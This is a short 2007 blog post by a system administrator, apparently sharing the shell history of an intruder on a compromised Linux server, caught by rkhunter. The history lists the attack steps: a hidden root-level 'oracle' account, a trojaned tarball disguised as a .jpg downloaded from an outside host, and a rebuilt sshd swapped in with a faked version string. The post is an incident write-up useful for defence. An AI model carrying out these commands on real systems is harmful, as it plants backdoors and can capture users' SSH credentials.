Oct

30

history of a compromised server

Here you have the bash_history excerpt from a compromised server. The attacker was lazy enough to not even cover his/her tracks. My night just got a whole lot more exciting due to this though.

311  /usr/sbin/useradd -o -u 0 oracle
312  passwd oracle
313  /sbin/ifconfig |grep inet
314  cd /home/oracle
315  ls
316  wget domain.tld/user/sniff.jpg
317  tar xzvf sniff.jpg
318  cd ssh
319  ls
320  telnet localhost 22
321  nano apps/ssh/ssh2version.h
322  SSH-2.0-OpenSSH_3.9p1
323  ./configure –without-x ; make ; make install
324  rm -rf /usr/sbin/sshd ; cp /usr/local/sbin/sshd /usr/sbin
325  kill -9 `cat /var/run/sshd.pid` ; /usr/sbin/sshd
326  cd ..
327  ls
328  rm -rf sniff.jpg  ssh

Caught by rkhunter.

This entry was posted by jake on 23:41, Oct 30th 2007 and filed in Linux.

You can subscribe the RSS Feed, leave a reply or trackback from your own blog.

Leave a Reply

You must be logged in to post a comment.